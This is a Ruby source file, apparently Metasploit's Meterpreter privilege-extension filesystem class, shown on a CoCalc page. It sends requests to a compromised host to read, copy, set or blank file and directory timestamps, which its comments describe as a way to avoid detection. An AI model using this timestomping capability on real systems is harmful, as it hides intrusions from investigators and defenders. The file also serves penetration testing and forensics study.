CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
# -*- coding: binary -*-
2

3
module Rex
4
module Post
5
module Meterpreter
6
module Extensions
7
module Priv
8

9
###
10
#
11
# This class provides an interface to modifying the file system to avoid
12
# detection, such as by modifying extended file system attributes.
13
#
14
###
15
class Fs
16

17
  #
18
  # Initializes the file system subsystem of the privilege escalation
19
  # extension.
20
  #
21
  def initialize(client)
22
    self.client = client
23
  end
24

25
  #
26
  # Returns a hash of the Modified, Accessed, Created, and Entry Modified
27
  # values for the specified file path.
28
  #
29
  def get_file_mace(file_path)
30
    request = Packet.create_request(COMMAND_ID_PRIV_FS_GET_FILE_MACE)
31

32
    request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
33

34
    response = client.send_request(request)
35

36
    # Return the hash of times associated with the MACE values
37
    begin
38
      return {
39
        'Modified'       => ::Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_MODIFIED)),
40
        'Accessed'       => ::Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_ACCESSED)),
41
        'Created'        => ::Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_CREATED)),
42
        'Entry Modified' => ::Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_EMODIFIED))
43
      }
44
    rescue RangeError
45
      raise RangeError, 'Invalid MACE values'
46
    end
47
  end
48

49
  #
50
  # Sets the Modified, Accessed, Created, and Entry Modified attributes of
51
  # the specified file path.  If a nil is supplied for a value, it will not
52
  # be modified.  Otherwise, the times should be instances of the Time class.
53
  #
54
  def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
55
    entry_modified = nil)
56
    request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE)
57

58
    request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
59
    request.add_tlv(TLV_TYPE_FS_FILE_MODIFIED, modified.to_i) if (modified)
60
    request.add_tlv(TLV_TYPE_FS_FILE_ACCESSED, accessed.to_i) if (accessed)
61
    request.add_tlv(TLV_TYPE_FS_FILE_CREATED, created.to_i) if (created)
62
    request.add_tlv(TLV_TYPE_FS_FILE_EMODIFIED, entry_modified.to_i) if (entry_modified)
63

64
    client.send_request(request)
65

66
    true
67
  end
68

69
  #
70
  # Sets the MACE attributes of the specified target_file_path to the MACE
71
  # attributes of the source_file_path.
72
  #
73
  def set_file_mace_from_file(target_file_path, source_file_path)
74
    request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE)
75

76
    request.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path)
77
    request.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path)
78

79
    client.send_request(request)
80

81
    true
82
  end
83

84
  #
85
  # Sets the MACE values to the minimum threshold that will cause them to not
86
  # be displayed by most all products for a file.
87
  #
88
  def blank_file_mace(file_path)
89
    request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE)
90

91
    request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
92

93
    client.send_request(request)
94

95
    true
96
  end
97

98
  #
99
  # Recursively set the MACE values to the minimum threshold for the supplied
100
  # directory.
101
  #
102
  def blank_directory_mace(dir_path)
103
    request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE)
104

105
    request.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path)
106

107
    client.send_request(request)
108

109
    true
110
  end
111

112
protected
113

114
  attr_accessor :client # :nodoc:
115

116
end
117

118
end; end; end; end; end
119

120